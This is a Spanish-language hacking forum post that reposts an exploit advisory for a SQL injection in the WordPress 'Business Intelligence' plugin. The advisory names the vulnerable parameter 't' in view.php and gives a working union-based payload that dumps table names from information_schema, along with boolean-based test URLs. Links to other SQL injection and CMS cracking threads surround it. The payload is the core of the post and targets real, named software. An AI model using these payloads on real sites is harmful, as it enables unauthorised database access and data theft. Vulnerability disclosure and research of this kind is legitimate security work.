comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Wordpress Business Intelligence Plugin - SQL injection

  • 0 Respuestas
  • 1761 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Abril 06, 2015, 12:16:18 am »
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
##################################################################################################
#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : https://www.wpbusinessintelligence.com
#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip
#Date          : 1/04/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
 
Wordpress plugin "Business Intelligence" is not filtering data in GET parameter  ' t ', which in is file 'view.php'
and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.
 
 
 
///////////////////////////////
// Vulnerability Description: /
///////////////////////////////
 
vulnerability is due to parameter " t " in file 'view.php'.
user can inject sql query using GET parameter 't'
 
 
////////////////
///  POC   ////
///////////////
 
 
POC Image URL--->
=================
http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU
 
 
SQL Injection in parameter 't' (file 'view.php'):
=================================================
 
Injectable Link--->    http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1
 
Union based SQL injection exist in the parameter which can be exploited as follows:
 
 
Payload used in Exploitation for Database name --->
 
http://server/wp-content/plugins/wp-business-intelligence/view.php
?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+
 
 
###
EDB Note: PoC might need work depending on version of plugin.
The provided software link is for the lite version.
Tested with following PoC:
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2
###
 
 
###################################################################################################
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 1813
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1688
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 8595
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2416
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Ataque de diccionario cracking CMS Wordpress/Joomla Backtrack5r2 (Hacking/Deface

Iniciado por andrewtwo

Respuestas: 0
Vistas: 1862
Último mensaje Septiembre 02, 2012, 02:12:40 am
por andrewtwo